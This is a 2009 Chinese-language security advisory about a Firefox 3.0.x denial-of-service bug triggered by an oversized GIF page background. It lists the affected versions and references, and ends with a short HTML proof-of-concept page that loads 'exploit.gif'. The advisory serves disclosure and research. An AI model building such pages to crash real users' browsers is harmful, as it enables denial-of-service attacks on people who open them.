Mozilla Firefox超大GIF文件背景拒绝服务漏洞

来源:岁月联盟 编辑:zhuzhu 时间:2009-10-25
Mozilla Firefox超大GIF文件背景拒绝服务漏洞 影响版本:
Mozilla Firefox 3.0.10
Mozilla Firefox 3.0.9
Mozilla Firefox 3.0.8
Mozilla Firefox 3.0.7 Beta
Mozilla Firefox 3.0.7
Mozilla Firefox 3.0.6
Mozilla Firefox 3.0.5
Mozilla Firefox 3.0.4
Mozilla Firefox 3.0.3
Mozilla Firefox 3.0.2
Mozilla Firefox 3.0.1
Mozilla Firefox 3.0 Beta 5
Mozilla Firefox 3.0漏洞描述:
Bugraq ID: 35280
CNCAN ID:CNCAN-2009061104

Mozilla Firefox是一款开放源代码的WEB浏览器。
Mozilla Firefox处理超大GIF图像作为背景时存在错误,远程安全者可以利用漏洞使应用程序崩溃。
构建恶意WEB页,诱使用户打开可触发此漏洞。<*参考 
http://www.securityfocus.com/archive/1/504214
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!<!-- Firefox 3.0.10 DOS exploit, discovered by
Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id)
http://y3dips.echo.or.id
//-->
<html>
<head>
<title>Firefox Exploit</title>
<body background="exploit.gif">
</body>
</html>SEBUG安全建议:
 目前没有解决方案提供:
http://www.mozilla.org/